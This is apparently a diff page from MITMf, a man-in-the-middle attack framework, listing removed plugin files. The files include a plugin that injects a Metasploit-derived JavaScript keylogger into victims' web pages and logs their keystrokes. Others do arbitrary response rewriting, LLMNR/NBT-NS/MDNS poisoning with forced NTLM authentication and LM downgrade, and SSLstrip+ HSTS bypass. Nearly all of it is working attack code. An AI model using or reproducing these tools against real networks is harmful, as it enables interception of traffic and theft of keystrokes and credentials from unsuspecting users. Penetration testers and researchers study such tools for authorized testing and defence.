# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
from plugins.plugin import Plugin
from plugins.Inject import Inject
import logging
mitmf_logger = logging.getLogger('mitmf')
class jskeylogger(Inject, Plugin):
name = "Javascript Keylogger"
optname = "jskeylogger"
desc = "Injects a javascript keylogger into clients webpages"
implements = ["handleResponse", "handleHeader", "connectionMade", "sendPostData"]
depends = ["Inject"]
version = "0.2"
has_opts = False
def initialize(self, options):
Inject.initialize(self, options)
self.html_payload = self.msf_keylogger()
def sendPostData(self, request):
#Handle the plugin output
if 'keylog' in request.uri:
raw_keys = request.postData.split("&&")[0]
keys = raw_keys.split(",")
del keys[0]; del(keys[len(keys)-1])
input_field = request.postData.split("&&")[1]
nice = ''
for n in keys:
if n == '9':
nice += "<TAB>"
elif n == '8':
nice = nice.replace(nice[-1:], "")
elif n == '13':
nice = ''
else:
try:
nice += n.decode('hex')
except:
mitmf_logger.warning("%s ERROR decoding char: %s" % (request.client.getClientIP(), n))
#try:
# input_field = input_field.decode('hex')
#except:
# mitmf_logger.warning("%s ERROR decoding input field name: %s" % (request.client.getClientIP(), input_field))
mitmf_logger.warning("%s [%s] Field: %s Keys: %s" % (request.client.getClientIP(), request.headers['host'], input_field, nice))
def msf_keylogger(self):
#Stolen from the Metasploit module http_javascript_keylogger
payload = """<script type="text/javascript">
window.onload = function mainfunc(){
var2 = ",";
name = '';
function make_xhr(){
var xhr;
try {
xhr = new XMLHttpRequest();
} catch(e) {
try {
xhr = new ActiveXObject("Microsoft.XMLHTTP");
} catch(e) {
xhr = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}
if(!xhr) {
throw "failed to create XMLHttpRequest";
}
return xhr;
}
xhr = make_xhr();
xhr.onreadystatechange = function() {
if(xhr.readyState == 4 && (xhr.status == 200 || xhr.status == 304)) {
eval(xhr.responseText);
}
}
if (window.addEventListener) {
document.addEventListener('keypress', function2, true);
document.addEventListener('keydown', function1, true);
} else if (window.attachEvent) {
document.attachEvent('onkeypress', function2);
document.attachEvent('onkeydown', function1);
} else {
document.onkeypress = function2;
document.onkeydown = function1;
}
}
function function2(e)
{
srcname = window.event.srcElement.name;
var3 = (window.event) ? window.event.keyCode : e.which;
var3 = var3.toString(16);
if (var3 != "d")
{
andxhr(var3, srcname);
}
}
function function1(e)
{
srcname = window.event.srcElement.name;
id = window.event.srcElement.id;
var3 = (window.event) ? window.event.keyCode : e.which;
if (var3 == 9 || var3 == 8 || var3 == 13)
{
andxhr(var3, srcname);
}
else if (var3 == 0)
{
text = document.getElementById(id).value;
if (text.length != 0)
{
andxhr(text.toString(16), srcname);
}
}
}
function andxhr(key, inputName)
{
if (inputName != name)
{
name = inputName;
var2 = ",";
}
var2= var2 + key + ",";
xhr.open("POST", "keylog", true);
xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xhr.send(var2 + '&&' + inputName);
if (key == 13 || var2.length > 3000)
{
var2 = ",";
}
}
</script>"""
return payload

View file

@ -1,105 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
"""
Plugin by @rubenthijssen
"""
import sys
import logging
import time
import re
from plugins.plugin import Plugin
from plugins.CacheKill import CacheKill
mitmf_logger = logging.getLogger('mitmf')
class Replace(CacheKill, Plugin):
name = "Replace"
optname = "replace"
desc = "Replace arbitrary content in HTML content"
implements = ["handleResponse", "handleHeader", "connectionMade"]
depends = ["CacheKill"]
version = "0.1"
has_opts = True
def initialize(self, options):
self.options = options
self.search_str = options.search_str
self.replace_str = options.replace_str
self.regex_file = options.regex_file
if (self.search_str is None or self.search_str == "") and self.regex_file is None:
sys.exit("[-] Please provide a search string or a regex file")
self.regexes = []
if self.regex_file is not None:
for line in self.regex_file:
self.regexes.append(line.strip().split("\t"))
if self.options.keep_cache:
self.implements.remove("handleHeader")
self.implements.remove("connectionMade")
self.ctable = {}
self.dtable = {}
self.mime = "text/html"
def handleResponse(self, request, data):
ip, hn, mime = self._get_req_info(request)
if self._should_replace(ip, hn, mime):
if self.search_str is not None and self.search_str != "":
data = data.replace(self.search_str, self.replace_str)
mitmf_logger.info("%s [%s] Replaced '%s' with '%s'" % (request.client.getClientIP(), request.headers['host'], self.search_str, self.replace_str))
# Did the user provide us with a regex file?
for regex in self.regexes:
try:
data = re.sub(regex[0], regex[1], data)
mitmf_logger.info("%s [%s] Occurances matching '%s' replaced with '%s'" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1]))
except Exception:
logging.error("%s [%s] Your provided regex (%s) or replace value (%s) is empty or invalid. Please debug your provided regex(es)" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1]))
self.ctable[ip] = time.time()
self.dtable[ip+hn] = True
return {'request': request, 'data': data}
return
def add_options(self, options):
options.add_argument("--search-str", type=str, default=None, help="String you would like to replace --replace-str with. Default: '' (empty string)")
options.add_argument("--replace-str", type=str, default="", help="String you would like to replace.")
options.add_argument("--regex-file", type=file, help="Load file with regexes. File format: <regex1>[tab]<regex2>[new-line]")
options.add_argument("--keep-cache", action="store_true", help="Don't kill the server/client caching.")
def _should_replace(self, ip, hn, mime):
return mime.find(self.mime) != -1
def _get_req_info(self, request):
ip = request.client.getClientIP()
hn = request.client.getRequestHostname()
mime = request.client.headers['Content-Type']
return (ip, hn, mime)

View file

@ -1,73 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import sys
import os
import threading
from plugins.plugin import Plugin
from libs.responder.Responder import ResponderMITMf
from core.sslstrip.DnsCache import DnsCache
from twisted.internet import reactor
class Responder(Plugin):
name = "Responder"
optname = "responder"
desc = "Poison LLMNR, NBT-NS and MDNS requests"
tree_output = ["NBT-NS, LLMNR & MDNS Responder v2.1.2 by Laurent Gaffie online"]
version = "0.2"
has_opts = True
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.interface = options.interface
try:
config = options.configfile['Responder']
except Exception, e:
sys.exit('[-] Error parsing config for Responder: ' + str(e))
if options.Analyse:
self.tree_output.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned")
resp = ResponderMITMf()
resp.setCoreVars(options, config)
result = resp.AnalyzeICMPRedirect()
if result:
for line in result:
self.tree_output.append(line)
resp.printDebugInfo()
resp.start()
def plugin_reactor(self, strippingFactory):
reactor.listenTCP(3141, strippingFactory)
def add_options(self, options):
options.add_argument('--analyze', dest="Analyse", action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning")
options.add_argument('--basic', dest="Basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")
options.add_argument('--wredir', dest="Wredirect", default=False, action="store_true", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' would). Default value is therefore set to False")
options.add_argument('--nbtns', dest="NBTNSDomain", default=False, action="store_true", help="Set this to enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network (like a classic 'nbns spoofer' would). Default value is therefore set to False")
options.add_argument('--fingerprint', dest="Finger", default=False, action="store_true", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query")
options.add_argument('--wpad', dest="WPAD_On_Off", default=False, action="store_true", help = "Set this to start the WPAD rogue proxy server. Default value is False")
options.add_argument('--forcewpadauth', dest="Force_WPAD_Auth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False")
options.add_argument('--lm', dest="LM_On_Off", default=False, action="store_true", help="Set this if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False")

View file

@ -1,56 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import sys
import logging
from plugins.plugin import Plugin
from core.utils import IpTables
from core.sslstrip.URLMonitor import URLMonitor
from libs.dnschef.dnschef import DNSChef
class HSTSbypass(Plugin):
name = 'SSLstrip+'
optname = 'hsts'
desc = 'Enables SSLstrip+ for partial HSTS bypass'
version = "0.4"
tree_output = ["SSLstrip+ by Leonardo Nve running"]
has_opts = False
def initialize(self, options):
self.options = options
self.manualiptables = options.manualiptables
try:
hstsconfig = options.configfile['SSLstrip+']
except Exception, e:
sys.exit("[-] Error parsing config for SSLstrip+: " + str(e))
if not options.manualiptables:
if IpTables.getInstance().dns is False:
IpTables.getInstance().DNS(options.ip_address, options.configfile['MITMf']['DNS']['port'])
URLMonitor.getInstance().setHstsBypass(hstsconfig)
DNSChef.getInstance().setHstsBypass(hstsconfig)
def finish(self):
if not self.manualiptables:
if IpTables.getInstance().dns is True:
IpTables.getInstance().Flush()

Some files were not shown because too many files have changed in this diff Show more